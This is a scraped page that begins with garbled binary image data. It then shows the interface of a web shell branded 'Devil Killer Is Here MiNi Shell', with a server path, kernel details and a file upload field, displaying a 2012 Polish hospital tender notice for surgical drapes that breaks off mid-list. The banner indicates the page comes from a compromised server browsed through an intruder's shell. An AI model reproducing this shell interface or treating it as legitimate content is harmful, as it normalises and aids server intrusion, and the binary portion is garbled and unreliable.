JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120618/206308-N-2012.html

<p class="kh_header"><b>Sosnowiec: Dostawa bielizny operacyjnej jednorazowego użytku</b><br>
<b>Numer ogłoszenia: 206308 - 2012; data zamieszczenia: 18.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny Nr 5 im. Św. Barbary w Sosnowcu , pl. Medyków 1, 41-200 Sosnowiec, woj. śląskie, tel. 032 3682012, 3682449, faks (032) 368 20 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> WWW.WSS5.PL</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa bielizny operacyjnej jednorazowego użytku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa bielizny operacyjnej jednorazowego użytku w kolorze niebieskim lub zielonym  w ilościach i asortymencie określonym w załączniku nr 1 do SIWZ - Formularz asortymentowo- cenowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające określone w art. 67 ust. 1 pkt 7 ustawy.
Zamawiający przewiduje udzielenie zamówień uzupełniających, stanowiących nie więcej niż 20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej
działalności lub czynności, jeżeli przepisy nakładają obowiązek ich posiadania, Zamawiający
żąda złożenia następujących dokumentów: 1. oświadczenia o spełnieniu warunków określonych
w art. 22 ust. 1 ustawy, o treści zgodnej ze wzorem, zamieszczonym w Rozdziale II, pkt. 2 SIWZ;
2. koncesji, zezwolenia lub licencji; jeśli ustawy nakładają obowiązek posiadania koncesji,
zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem
publicznym jeśli ustawy nie nakładają obowiązku posiadania w/w dokumentów złożenia
oświadczenia wzór nr 4 w rozdziale II SIWZ Warunki udziału Wykonawcy w postępowaniu
oceniane będą według kryterium spełnia - nie spełnia na podstawie analizy treści złożonych
przez Wykonawcę oświadczeń i dokumentów wymaganych przez Zamawiającego wymienionych
w SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz
dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
Zamawiający żąda złożenia następujących dokumentów: 1. oświadczenia o spełnieniu warunków
określonych w art. 22 ust. 1 ustawy, o treści zgodnej ze wzorem, zamieszczonym w Rozdziale II,
pkt. 2 SIWZ; Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym,
osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru
prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest
udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji
zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów
do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu
zamówienia ( art. 26 ust. 2b Ustawy). W przypadku składania oferty przez wykonawców wspólnie
ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy, dokumenty i oświadczenia o spełnianiu każdego z warunków, o których mowa w art. 21 ust 1 ustawy składa,
co najmniej jeden z Wykonawców albo wszyscy ci wykonawcy wspólnie Warunki udziału
Wykonawcy w postępowaniu oceniane będą według kryterium spełnia - nie spełnia na podstawie
analizy treści złożonych przez Wykonawcę oświadczeń i dokumentów wymaganych przez
Zamawiającego wymienionych w SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz
dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
Zamawiający żąda złożenia następujących dokumentów: 1. oświadczenia o spełnieniu warunków
określonych w art. 22 ust. 1 ustawy, o treści zgodnej ze wzorem, zamieszczonym w Rozdziale II,
pkt. 2 SIWZ; Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym,
osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru
prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest
udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji
zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów
do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu
zamówienia ( art. 26 ust. 2b Ustawy). W przypadku składania oferty przez wykonawców wspólnie
ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy, dokumenty i
oświadczenia o spełnianiu każdego z warunków, o których mowa w art. 21 ust 1 ustawy składa,
co najmniej jeden z Wykonawców albo wszyscy ci wykonawcy wspólnie Warunki udziału
Wykonawcy w postępowaniu oceniane będą według kryterium spełnia - nie spełnia na podstawie
analizy treści złożonych przez Wykonawcę oświadczeń i dokumentów wymaganych przez
Zamawiającego wymienionych w SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz
dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
Zamawiający żąda złożenia następujących dokumentów: 1. oświadczenia o spełnieniu warunków
określonych w art. 22 ust. 1 ustawy, o treści zgodnej ze wzorem, zamieszczonym w Rozdziale II,
pkt. 2 SIWZ; Wykonawca moSe polegać na wiedzy i doświadczeniu, potencjale technicznym,
osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru
prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest
udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji
zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów
do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia ( art. 26 ust. 2b Ustawy). W przypadku składania oferty przez wykonawców wspólnie
ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy, dokumenty i
oświadczenia o spełnianiu każdego z warunków, o których mowa w art. 21 ust 1 ustawy składa,
co najmniej jeden z Wykonawców albo wszyscy ci wykonawcy wspólnie Warunki udziału
Wykonawcy w postępowaniu oceniane będą według kryterium spełnia - nie spełnia na podstawie
analizy treści złożonych przez Wykonawcę oświadczeń i dokumentów wymaganych przez
Zamawiającego wymienionych w SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada sytuację ekonomiczną i finansową zapewniającą
prawidłowe wykonanie zamówienia, Zamawiający żąda złożenia następujących dokumentów: 1.
oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy, o treści zgodnej ze
wzorem, zamieszczonym w Rozdziale II, pkt. 2 SIWZ; Wykonawca może polegać na wiedzy i
doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych
podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w
takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami
niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne
zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres
korzystania z nich przy wykonaniu zamówienia ( art. 26 ust. 2b Ustawy). W przypadku składania
oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art.
23 ustawy, dokumenty i oświadczenia o spełnianiu kaSdego z warunków, o których mowa w art.
21 ust 1 ustawy składa, co najmniej jeden z Wykonawców albo wszyscy ci wykonawcy wspólnie
Warunki udziału Wykonawcy w postępowaniu oceniane będą według kryterium spełnia - nie
spełnia na podstawie analizy treści złożonych przez Wykonawcę oświadczeń i dokumentów
wymaganych przez Zamawiającego wymienionych w SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie Wykonawcy (zgodnie z zał. Nr 5 do SIWZ), iż zaoferowany przedmiot zamówienia jest dopuszczony do obrotu i do używania w Rzeczypospolitej Polskiej oraz spełnia wymagania przewidziane przepisami prawa w tym w szczególności ustawą z dnia 20 maja 2010 roku o wyrobach medycznych (Dz. U. z 2010r., nr 107, poz. 679) oraz, że posiada na potwierdzenie powyższego wymagane przepisami prawa dokumenty (w szczególności: potwierdzenie zgłoszenia albo powiadomienia do Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych, atesty), które dostarczy do wglądu na żądanie Zamawiającego. 
Deklaracja Zgodności
Certyfikat CE 
Ulotki ( np. katalogów, specyfikacji technicznych, opisów merytorycznych itp.) w języku polskim, zawierających informacje o parametrach, cechach techniczno - użytkowych 
i charakterystyce oferowanych wyrobów dla potwierdzenia i udokumentowania spełniania wymagań Zamawiającego dotyczących przedmiotu zamówienia określonych w SIWZ - dotyczy wszystkich pakietów
Próbki oferowanych przez Wykonawcę artykułów ( w ilości - 1 sztuka) w celu sprawdzenia przez Zamawiającego spełnienia wymagań dotyczących przedmiotu zamówienia, określonych w załączniku nr 1 do SIWZ oraz weryfikacji ewentualnych późniejszych dostaw. Próbki Wykonawca dostarcza na własny koszt. 
Zamawiający zwróci próbki w trybie zgodnym z zapisami art. 97 ust.2.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pełnomocnictwo lub umowa podmiotów występujących wspólnie wskazujące, że osoba występująca w imieniu wykonawcy jest do tego upoważniona, jeżeli nie wynika to z załączonych do oferty dokumentów,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy, w przypadku, gdy nastąpi zmiana powszechnie
obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu umowy.
Zamawiający dopuszcza w szczególności zmianę postanowień umowy w przypadku: zmiany stawki
podatku VAT wpływającej na wynagrodzenie Wykonawcy Zmiana postanowień zawartej umowy może nastąpić wyłącznie w przypadkach przewidzianych ustawą oraz postanowieniami niniejszej Specyfikacji
istotnych warunków zamówienia, za zgodą obu Stron wyrażoną na piśmie w formie aneksu do umowy, pod
rygorem nieważności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wss5.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital
Specjalistyczny nr 5 im. św. Barbary w Sosnowcu Plac Medyków 1, 41-200 Sosnowiec pokój B-1-3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2012 godzina 10:30, miejsce: Wojewódzki Szpital Specjalistyczny nr 5 im. św. Barbary w Sosnowcu Plac
Medyków 1, 41-200 Sosnowiec Kancelaria pokój D-0-2...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sterylne serwety.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Serweta jałowa,  nieprzylepna o wymiarze min. 150 cm x 200 cm. wykonana z min. 2 warstw (folia polietylenowa i włóknina polipropylenowa) o 
gramaturze materiału na całej powierzchni minimum 53 g/m2. 
Materiał serwety musi spełniać wymogi normy EN 13795-1 - 3 oraz posiadać informacje o dacie ważności i nr serii w postaci naklejki do umieszczenia na karcie pacjenta.
- Serweta jałowa, nieprzylepna o wymiarze min. 100 cm x 150 cm. wykonana z min. 2 warstw (folia polietylenow i włóknina polipropylenowa) o gramaturze materiału na całej powierzchni min 53 g/m2 
Materiał serwety musi spełniać wymogi normy EN 13795-1 - 3 oraz posiadać informacje o dacie ważności i nr serii w postaci naklejki do umieszczenia na karcie pacjenta.
- Serweta jałowa, nieprzylepna o wymiarze min. 75 cm x 75-90cm. wykonana z min. 2 warstw (folia polietylenowa i włóknina polipropylenowa) o gramaturze materiału na całej powierzchni min 53 g/m2.
Materiał serwety musi spełniać wymogi normy EN 13795 -1 - 3 oraz posiadać informacje o dacie ważności i nr serii w postaci naklejki do umieszczenia na karcie pacjenta.
- Serweta sterylna nieprzemakalna z laminatu min. dwuwarstwowego o rozmiarach 50cmx60cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sterylne serwety z otworem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Serweta sterylna nieprzemakalna z laminatu min. dwuwarstwowego o rozmiarze min 110cmx80cm z centralnie umieszczonym otworem owalnym o rozm. min 10cmx15cm i przylepcem
2	Serweta sterylna o rozmiarach 100 cm x 150 cm z otworem 6 cmx 8 cm nieprzylepna, wykonana z minimum 2 warstw (folia polietylenowa i włoknina polipropylenowa) o gramaturze materiału na całej powierzchni min. 53g/m2. Materiał serwety musi spełniać wymogi normy EN 13795-1-3 oraz posiadać informacje o dacie ważności i nr serii w postaci naklejki do umieszczania na karcie pacjenta.
3	Serweta sterylna o rozmiarach 75 cm x 75 cm z otworem owalnym nieprzylepna, wykonana z minimum 2 warstw (folia polietylenowa i włoknina polipropylenowa) o gramaturze materiału na całej powierzchni min. 53g/m2. Materiał serwety musi spełniać wymogi normy EN 13795-1-3 oraz posiadać informacje o dacie ważności i nr serii w postaci naklejki do umieszczania na karcie pacjenta.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sterylne zestawy specjalistyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zestaw serwet jałowych uniwersalny z dodatkowymi wstawkami chłonnymi
 Minimalny skład zestawu: 
1 szt.  serweta o wymiarze 150 x 250 cm +/-10 cm samoprzylepna z dodatkowym elementem chłonnym o min. wym. 50 x 75 cm 
1 szt. serweta o wymiarze 180 x 170 cm  +/- 10cm samoprzylepna z dodatkowym elementem chłonnym o min. wym. 50 x 75 cm
2 szt.  serwety samoprzylepne o wymiarze min. 75 x 90 cm z dodatkowym elementem chłonnym o min. wym. 45 x 60 cm
1 szt.  obłożenie na stolik MAYO o wymiarze min. 80 x 140 cm w formie worka - złożone teleskopowo
1 szt. serweta na stolik narzędziowy o wym. min.140 x 190 cm jako owinięcie zestawu
taśma samoprzylepna 10 x 50 cm i ręczniki celulozowe
2	Zestaw serwet jałowych do procedur neurochirurgicznych  
 Minimalnym skład zestawu :
1 szt.  serweta do obłożenia czaszki o wym. minimum 245 cm x 320 cm.  z oknem wypełnionym folią chirurgiczną o min. wym. 19 cm x 30 cm z torbą do zbierania płynów z sitem i zaworem 
1 szt.  obłożenie na  stolik Mayo o  wym. min. 80  x 140 cm
2 szt. samoprzylepne serwety o min. wym. 50 cm x 50 cm 
1 szt.  serweta do nakrycia stołu narzędziowego o min. wym. 140 cm x 190 cm.  owinięcie zestawu
2 szt.  uchwyty Velcro do mocowania kabli i drenów o min. wym. 2 x 23 cm .
3	Zestaw serwet jałowych do operacji okulistycznych 
Minimalny skład zestawu : 
